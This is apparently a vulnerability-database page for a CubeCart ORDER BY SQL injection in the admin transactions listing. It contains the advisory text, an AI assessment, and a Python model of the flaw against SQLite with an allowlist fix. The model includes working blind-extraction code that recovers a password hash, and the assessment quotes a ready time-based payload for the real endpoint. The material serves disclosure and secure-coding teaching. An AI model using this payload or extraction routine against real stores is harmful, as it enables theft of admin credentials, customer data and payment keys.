Severity by source

CVSS 3.1 base vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
Primary rating from GitHub Advisory, the only source for this CVE.
Description (GitHub Advisory)
CubeCart is an ecommerce software solution. Prior to 6.7.0, the admin orders-transactions listing page (admin.php?_g=orders&node=transactions) builds a raw ORDER BY SQL fragment from the attacker-controlled $_GET['sort'] array without column or direction validation. Both the column key and the direction value flow into the query string as bare SQL tokens, and the framework's sqlSafe() (mysqli escape_string) escapes only quote characters - none of which are required for ORDER BY injection. An authenticated administrator with the minimum CC_PERM_READ permission on orders can execute arbitrary SQL against the store database, including time-based blind extraction of admin password hashes, customer PII, and integrated payment-gateway credentials. This vulnerability is fixed in 6.7.0.
Analysis (AI)

SQL injection in CubeCart v6 prior to 6.7.0 allows an authenticated administrator to execute arbitrary SQL against the store database via the unvalidated ORDER BY clause on the admin transactions listing page. The admin.php orders-transactions endpoint concatenates attacker-controlled GET parameters into a raw SQL fragment; the escaping applied by the platform's sqlSafe() function is ineffective here because it only escapes quote characters, none of which an ORDER BY payload needs. …
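The mechanism described above (sort keys and directions concatenated as bare SQL tokens after quote-only escaping) and the blind-extraction scenario in the assessment below, as an added worked example. This is not CubeCart's code and not the advisory's: it is a model written in Python against an in-memory SQLite database so it runs stand-alone. The schema, rows, function names (`build_order_by_vulnerable`, `build_order_by_safe`, `oracle`, `extract_secret_prefix`) and the `SORTABLE` allowlist are all constructed for the example. SQLite has no `SLEEP()`, so instead of the time-based oracle in the scenario the payload uses an ordering oracle (`CASE WHEN … THEN id ELSE -id END`); the underlying point is the same, namely that anything placed where a column name is expected is evaluated as an expression, so quote escaping does not help.

```python
"""Model of an ORDER BY injection through quote-only escaping, plus the
allowlist fix. Constructed example: not CubeCart's schema or code."""
import sqlite3


def make_db():
    """Constructed sample data; the table and column names are assumptions."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE transactions(id INTEGER PRIMARY KEY, amount REAL, status TEXT);
        INSERT INTO transactions VALUES (1, 10.0, 'Complete'), (2, 25.5, 'Pending'),
                                        (3, 7.0, 'Complete');
        CREATE TABLE admin_user(id INTEGER PRIMARY KEY, email TEXT, password TEXT);
        INSERT INTO admin_user VALUES (1, 'admin@example.test', '$2y$10$constructedhash');
    """)
    return conn


def mysqli_escape(value):
    """Emulates mysqli_real_escape_string: only NUL, newline, CR, backslash,
    both quote characters and Ctrl-Z are escaped. Parentheses, commas,
    operators and function names pass through untouched."""
    table = {"\0": "\\0", "\n": "\\n", "\r": "\\r", "\\": "\\\\",
             "'": "\\'", '"': '\\"', "\x1a": "\\Z"}
    return "".join(table.get(ch, ch) for ch in value)


def build_order_by_vulnerable(sort):
    """Vulnerable pattern: each key and value of the sort array becomes a bare token."""
    parts = [f"{mysqli_escape(col)} {mysqli_escape(direction)}"
             for col, direction in sort.items()]
    return "ORDER BY " + ", ".join(parts)


def first_row_id(conn, sort):
    """The listing query: the attacker only observes which row comes first."""
    sql = "SELECT id FROM transactions " + build_order_by_vulnerable(sort)
    return conn.execute(sql).fetchone()[0]


def oracle(conn, condition):
    """Boolean oracle built from the sort key: a true condition sorts ids
    ascending (first id is 1), a false one sorts them descending. No quotes
    are needed, so mysqli-style escaping changes nothing."""
    payload = f"(CASE WHEN {condition} THEN id ELSE -id END)"
    return first_row_id(conn, {payload: "ASC"}) == 1


def extract_secret_prefix(conn, length):
    """Recovers the first `length` characters of the stored admin password
    hash, one code point at a time by binary search over printable ASCII."""
    recovered = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            cond = (f"unicode(substr((SELECT password FROM admin_user LIMIT 1),"
                    f"{pos},1)) > {mid}")
            if oracle(conn, cond):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


# Hardened builder: map request keys to known columns, accept only two
# directions, and never interpolate the request value itself.
SORTABLE = {"id": "id", "amount": "amount", "status": "status"}  # assumed columns
DIRECTIONS = {"ASC", "DESC"}


def build_order_by_safe(sort):
    parts = []
    for key, direction in sort.items():
        direction = str(direction).upper()
        if key not in SORTABLE or direction not in DIRECTIONS:
            raise ValueError(f"rejected sort parameter: {key!r}={direction!r}")
        parts.append(f"`{SORTABLE[key]}` {direction}")  # backticks: MySQL style, accepted by SQLite
    return "ORDER BY " + ", ".join(parts) if parts else ""


def is_rejected(sort):
    """True when the hardened builder refuses the given sort array."""
    try:
        build_order_by_safe(sort)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    db = make_db()
    print(extract_secret_prefix(db, 4))          # leaks "$2y$" through sort order alone
    print(build_order_by_safe({"amount": "desc"}))
    print(is_rejected({"(CASE WHEN 1=1 THEN id ELSE -id END)": "ASC"}))
```

The fix is an allowlist, not escaping: identifiers and keywords cannot be quoted into safety in a string-concatenated query, so the only defensible pattern is to look the request key up in a fixed map of sortable columns and to compare the direction against the two literal keywords, rejecting anything else before it reaches the query.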
Vulnerability Assessment (AI)

| Aspect | Assessment |
| --- | --- |
| Exploitation | Exploitation requires an authenticated CubeCart administrator account holding at minimum the CC_PERM_READ permission scoped to the orders module; this is the specific access-control gate documented in the CVE description. … |
| Risk Assessment | The CVSS score of 4.9 (Medium) is consistent with the vector above: network-reachable and low complexity, but gated on high privileges, with a confidentiality-only impact. … |
| Exploit Scenario | An attacker who has obtained CubeCart administrator credentials, whether through phishing, credential stuffing against the admin login, or insider access, navigates to admin.php?_g=orders&node=transactions and appends a crafted sort parameter such as &sort[IF(1=1,SLEEP(5),id)]=ASC. The server-side query incorporates this expression without validation, so the database delays its response conditionally on the injected logic, enabling time-based blind extraction of the admin_user table (including bcrypt/MD5 password hashes) and of payment-gateway API keys stored in the database. … |
| Remediation | The primary fix is to upgrade CubeCart to version 6.7.0 or later; 6.7.0 is confirmed as the patched release by the vendor security advisory at https://github.com/cubecart/v6/security/advisories/GHSA-rm2f-rpcq-6w9f. … |
EUVD-2026-30171